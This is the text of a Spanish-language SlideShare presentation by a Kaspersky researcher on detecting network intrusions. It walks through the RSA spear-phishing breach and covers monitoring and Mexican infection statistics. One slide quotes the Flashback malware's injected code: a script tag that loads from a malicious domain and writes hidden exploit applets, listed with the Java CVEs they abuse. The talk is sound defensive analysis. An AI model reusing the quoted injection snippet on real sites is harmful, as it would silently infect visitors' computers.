Detectando intrusos en la red

3,351 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
3,351
On SlideShare
0
From Embeds
0
Number of Embeds
1,499
Actions
Shares
0
Downloads
25
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Detectando intrusos en la red

  1. 1. Detectando Intrusiones en la Red Mas allá de los IDS
  2. 2. Roberto Martínez • Instructor UniversIT y Conferencista• Consultor Especializado en Seguridad Informática • Malware Researcher at Global Research and Analysis Team Kaspersky Lab | Latam -Mexico @r0bertmart1nez
  3. 3. Agenda• ¿Esta alguien seguro?• RSA Anatomía de un ataque• ¿Cuanto es suficiente en Seguridad?• El problema• Demo: Fisonomía de un ataque• La solución• Demo: Esquemas de detección• Conclusión
  4. 4. ¿Está alguien esta seguro?
  5. 5. Anatomía de un ataque http://blogs.rsa.com/rivner/anatomy-of-an-attack/
  6. 6. Acciones previas al ataque Lo primero que hicieron los hackers detrás de la APT fué buscar información públicamente disponible sobre• empleados específicos, principalmente redes sociales. Una vez que consiguieron la información, enviaron a esos usuarios un correo electrónico tipo Spear Phishing.•
  7. 7. • Click to edit Master text styles El Problema – Second level • Third level – Fourth level » Fifth level
  8. 8. ¿Como sucedió el ataque?• El atacante envío dos correos electrónicos diferentes durante un período de dos días.• Los dos correos electrónicos fueron enviados a dos pequeños grupos de empleados sin importar que fueran de alto perfil.• El correo electrónico fue diseñado lo suficientemente bien como para truco, uno de los empleados lo recuperara de su carpeta de correo no deseado y abriera el archivo de excel adjunto.• La hoja de cálculo contenía una vulnerabilidad de día cero que instalaba una puerta trasera a través de una vulnerabilidad en Adobe Flash (CVE-2011-0609).
  9. 9. • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level
  10. 10. Una vez abierto el correo….
  11. 11. El resultado $ 66.3 mdd. http://www.govinfosecurity.com/articles.php?art_id=3913
  12. 12. ¿Cuanto es suficiente en Seguridad?
  13. 13. Cuatro principales tipos de ataque
  14. 14. • Estas empresas implementan cualquier combinación imaginable de seguridad perimetral, seguridad end-point, campañas de sensibilización al usuario final, políticas y controles.
  15. 15. ¿Que estafallando?
  16. 16. El eslabón más débil
  17. 17. 2011 - 2012 Targets
  18. 18. Flashback / Flashfake<scriptsrc="http://domainname.rr.nu/nl.php? Vulnerabilities exploited:p=d"></script> CVE2008-5353 ("deserializing Calendar objects") CVE2011-3544 CVE2012-0507 if(rts != "on"){ document.write(<applet archive="rh-3.jar" code="rhcls" width="1" height="1"></applet>); document.write(<applet archive="cl-3.jar" code="msf/x/AppletX" width="1" height="1"></applet>); }
  19. 19. Alexander Gostev - Global Research and Analysis Team at Kaspersky Lab  http://www.securelist.com
  20. 20. Tim - Global Research and Analysis Team at Kaspersky Lab  http://www.securelist.com
  21. 21. La solución
  22. 22. Herramientas avanzadas de monitoreo
  23. 23. Análisis de Topología Vulnerable
  24. 24. México en númerosDistrito federal 4872116 318481- 4622291 313378quintana roo 336357 35007nuevo leon 389071 26309jalisco 342151 23494mexico 228796 16139veracruz-llave 90464 7728puebla 124722 6476baja california 99374 5082chihuahua 42742 4610morelos 54586 4610queretaro de 46559 3873arteaga
  25. 25. Conclusión
  26. 26. Gracias@r0bertmart1nezroberto.martinez@kaspersky.com

×